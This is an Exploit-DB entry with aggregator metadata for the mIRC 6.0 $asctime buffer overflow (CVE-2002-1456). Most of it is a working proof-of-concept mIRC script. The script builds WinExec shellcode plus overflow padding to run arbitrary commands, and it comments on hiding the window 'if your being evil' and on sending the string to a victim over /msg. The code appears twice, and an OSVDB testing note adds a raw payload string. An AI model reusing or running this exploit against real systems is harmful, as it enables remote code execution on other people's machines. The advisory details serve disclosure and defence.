ID EDB-ID:21759 Type exploitdb Reporter James Martin Modified 2002-08-27T00:00:00
Description
mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability. CVE-2002-1456. Remote exploit for windows platform
source: http://www.securityfocus.com/bid/5576/info
mIRC is a chat client for the IRC protocol, designed for Microsoft Windows based operating systems. mIRC includes support for a scripting language.
A buffer overflow vulnerability has been reported in the $asctime identifier, a function in the mIRC scripting language. The error lies in the handling over oversized format specifier strings.
Exploitation will rely on a script passing untrusted input to this function. Reportedly, no such script is included in the default installation of mIRC.
; Proof of concept Code for asctime exploit
; Author: James Martin
; Website: http://www.uuuppz.com
; Email: me@uuuppz.com
;
; Usage:
; /asctime_poc notepad c:\autoexec.nat
; /asctime_poc command.com /c echo Your have been rooted > c:\rooted.txt
; etc :)
;
;
/asctime_poc {
; Set Show State
;
; Valid Values:
; 1 - Show Normal (This will break a ctcp request)
; 2 - Minimise (If your being evil... ;))
; 3 - Maximise
set %showstate 2
; Build Coded Command String
set %command $1-
set %count 1
unset %codedcommand
:loop
set %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))
set %count $calc( %count + 1)
if %count <= $len(%command) goto loop
; Shell Code to Execute
;
; Detects mirc version, decodes the command string then calls winexec
set %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3)
; Build Exploit String
set %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2- $len(%command))) $+ q $+ $chr(17) $+ $chr(64)
; Run exploit string
;
; In the real world it would be more like
; /msg muppet weirdcommand %exploitstring
echo 1 $asctime(%exploitstring)
}
{"published": "2002-08-27T00:00:00", "id": "EDB-ID:21759", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "63b5078bd63fb1602eda3edb4e3c1a0f02f115c9f198b7c0bc02010a843b7094", "description": "mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability. CVE-2002-1456. Remote exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/21759/", "lastseen": "2016-02-02T17:12:26", "edition": 1, "title": "mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability", "osvdbidlist": ["6405"], "modified": "2002-08-27T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1456"], "sourceHref": "https://www.exploit-db.com/download/21759/", "references": [], "reporter": "James Martin", "sourceData": "source: http://www.securityfocus.com/bid/5576/info\r\n\r\nmIRC is a chat client for the IRC protocol, designed for Microsoft Windows based operating systems. mIRC includes support for a scripting language.\r\n\r\nA buffer overflow vulnerability has been reported in the $asctime identifier, a function in the mIRC scripting language. The error lies in the handling over oversized format specifier strings.\r\n\r\nExploitation will rely on a script passing untrusted input to this function. Reportedly, no such script is included in the default installation of mIRC. \r\n\r\n; Proof of concept Code for asctime exploit\r\n; Author: James Martin\r\n; Website: http://www.uuuppz.com\r\n; Email: me@uuuppz.com\r\n;\r\n; Usage:\r\n; /asctime_poc notepad c:\\autoexec.nat\r\n; /asctime_poc command.com /c echo Your have been rooted > c:\\rooted.txt\r\n; etc :)\r\n;\r\n;\r\n/asctime_poc {\r\n; Set Show State\r\n;\r\n; Valid Values:\r\n; 1 - Show Normal (This will break a ctcp request)\r\n; 2 - Minimise (If your being evil... ;))\r\n; 3 - Maximise\r\nset %showstate 2\r\n\r\n; Build Coded Command String\r\nset %command $1-\r\nset %count 1\r\nunset %codedcommand\r\n:loop\r\nset %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))\r\nset %count $calc( %count + 1)\r\nif %count <= $len(%command) goto loop \r\n\r\n; Shell Code to Execute\r\n;\r\n; Detects mirc version, decodes the command string then calls winexec\r\nset %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3) \r\n\r\n; Build Exploit String\r\nset %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2- $len(%command))) $+ q $+ $chr(17) $+ $chr(64) \r\n\r\n; Run exploit string\r\n;\r\n; In the real world it would be more like\r\n; /msg muppet weirdcommand %exploitstring\r\necho 1 $asctime(%exploitstring)\r\n}\r\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2002-1456", "type": "cve", "title": "CVE-2002-1456", "description": "Buffer overflow in mIRC 6.0.2 and earlier allows remote attackers to execute arbitrary code via a long $asctime value.", "published": "2003-06-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1456", "cvelist": ["CVE-2002-1456"], "lastseen": "2017-07-11T11:14:11"}], "osvdb": [{"id": "OSVDB:6405", "type": "osvdb", "title": "mIRC asctime Input Overflow", "description": "## Vulnerability Description\nA remote overflow exists in mIRC. mIRC fails to limit paramters given to asctime(), resulting in a buffer overflow. With a specially crafted request, an attacker can cause the target machine to execute arbitrary code resulting in a loss of confidentiality and integrity.\n## Solution Description\nUpgrade to version 6.03 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s):\n\nDisable scripts or check input on functions that use the asctime() function.\n\n## Short Description\nA remote overflow exists in mIRC. mIRC fails to limit paramters given to asctime(), resulting in a buffer overflow. With a specially crafted request, an attacker can cause the target machine to execute arbitrary code resulting in a loss of confidentiality and integrity.\n## Manual Testing Notes\n//echo uuuppz $asctime(\u00b8PPP\u00ff\u00c1\u00e0*10\u00c1\u00e8*10f<*30f\u0081\u00fb\u00dcqu*07\u00b8\u00fa\u00fd*05\u00ff\u00eb*23f\u0081\u00fb\u00ff\u00ffu*07\u00b8\u00be\u00bb*04\u00ff\u00eb*05\u00b8\u00d2\u0081*04\u00ff5PPP\u00ff\u00eb*36YjQIA\u20ac9\u00ffu\u00eb*05\u20ac1\u20ac\u00eb\u00f3\u20ac1\u00ff\u00ff\u00d0]]]<\u00e5]\u00c3\u00e8\u00dd\u00ff\u00ff\u00ff\u20ac\u00ffaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaq*21@)\n\n## References:\nVendor URL: http://www.mirc.co.uk\nOther Advisory URL: http://www.uuuppz.com/research/adv-002-mirc.htm\nOther Advisory URL: http://securitytracker.com/alerts/2002/Aug/1005148.html\nISS X-Force ID: 9970\n[CVE-2002-1456](https://vulners.com/cve/CVE-2002-1456)\nBugtraq ID: 5576\n", "published": "2002-08-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:6405", "cvelist": ["CVE-2002-1456"], "lastseen": "2017-04-28T13:20:01"}]}}